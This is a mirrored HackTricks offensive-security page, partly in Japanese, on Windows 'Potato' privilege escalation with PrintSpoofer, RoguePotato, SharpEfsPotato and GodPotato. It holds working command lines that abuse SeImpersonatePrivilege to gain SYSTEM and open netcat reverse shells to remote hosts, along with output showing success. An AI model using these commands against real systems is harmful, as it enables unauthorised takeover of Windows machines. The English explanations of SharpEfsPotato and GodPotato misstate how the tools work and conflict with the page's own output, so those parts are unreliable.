Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00

Translator ea4f8de5e2 Translated ['windows-hardening/windows-local-privilege-escalation/roguep

2023-11-05 22:41:08 +00:00

9.5 KiB

Raw Blame History

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サイバーセキュリティ会社で働いていますか？ HackTricksであなたの会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたいですか、またはHackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを発見しましょう、私たちの独占的なNFTのコレクション
公式のPEASS＆HackTricks swagを手に入れましょう
💬 Discordグループまたはtelegramグループに参加するか、Twitterで私をフォローしてください🐦@carlospolopm.
hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。

{% hint style="warning" %} JuicyPotatoはWindows Server 2019およびWindows 10ビルド1809以降では動作しません。ただし、PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotatoを使用して、同じ特権を利用し、NT AUTHORITY\SYSTEMレベルのアクセスを取得することができます。このブログ記事では、JuicyPotatoが動作しないWindows 10およびServer 2019ホストで、PrintSpooferツールを使用して偽装特権を悪用する方法について詳しく説明しています。 {% endhint %}

クイックデモ

PrintSpoofer

c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening...

[+] CreateProcessAsUser() OK

NULL

RoguePotato

{% code overflow="wrap" %}

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

{% code %}

SharpEfsPotato

SharpEfsPotato is a tool that exploits the EFS (Encrypting File System) service in Windows to achieve local privilege escalation. It leverages the "RoguePotato" technique, which takes advantage of the Windows Print Spooler service to execute arbitrary code with SYSTEM privileges.

Usage

To use SharpEfsPotato, follow these steps:

Download the tool from the GitHub repository.
Compile the source code using Visual Studio or use the precompiled binary.
Execute the tool with the following command:

SharpEfsPotato.exe

How it Works

SharpEfsPotato works by creating a rogue print server and a rogue printer. When the Print Spooler service starts, it loads a DLL file specified in the printer's configuration. By exploiting the DLL search order hijacking vulnerability, SharpEfsPotato can force the Print Spooler service to load a malicious DLL file with SYSTEM privileges.

Limitations

SharpEfsPotato requires administrative privileges to create the rogue print server and printer.
The target system must have the Print Spooler service enabled.
The technique may not work on systems with certain security configurations or mitigations in place.

Mitigations

To mitigate the risks associated with SharpEfsPotato, consider the following measures:

Disable the Print Spooler service if it is not required.
Regularly apply security updates and patches to the operating system.
Implement strong access controls and permissions to limit the impact of potential privilege escalation attacks.

Conclusion

SharpEfsPotato is a powerful tool for local privilege escalation on Windows systems. By exploiting the EFS service and the DLL search order hijacking vulnerability in the Print Spooler service, it can elevate privileges to SYSTEM level. However, it is important to use this tool responsibly and only in authorized penetration testing scenarios.

{% endcode %}

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

GodPotato

GodPotato is a tool that combines the power of RoguePotato and PrintSpoofer to achieve local privilege escalation on Windows systems. It takes advantage of the Windows Print Spooler service and the impersonation capabilities of the Distributed Component Object Model (DCOM) to execute arbitrary code with SYSTEM privileges.

To use GodPotato, you need to have a low-privileged user account on the target system. First, you need to download the RoguePotato and PrintSpoofer tools. RoguePotato is used to create a malicious DCOM object, while PrintSpoofer is used to exploit the Print Spooler service.

Once you have the tools, follow these steps:

Run RoguePotato with the following command to create a malicious DCOM object:

RoguePotato.exe -r <attacker_ip>:<attacker_port>

Replace <attacker_ip> and <attacker_port> with your IP address and the port you want to listen on.

Start a listener on your machine to receive the connection from the target system. For example, you can use netcat:

nc -nlvp <attacker_port>

Replace <attacker_port> with the same port you used in the previous step.

On the target system, run PrintSpoofer with the following command to exploit the Print Spooler service:

PrintSpoofer.exe -i -c <attacker_command>

Replace <attacker_command> with the command you want to execute on the target system.

If everything goes well, you should see a connection on your listener. You now have a shell with SYSTEM privileges on the target system.

It's important to note that GodPotato exploits a vulnerability in the Windows Print Spooler service, which has been patched by Microsoft. Therefore, this technique may not work on fully patched systems.

GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"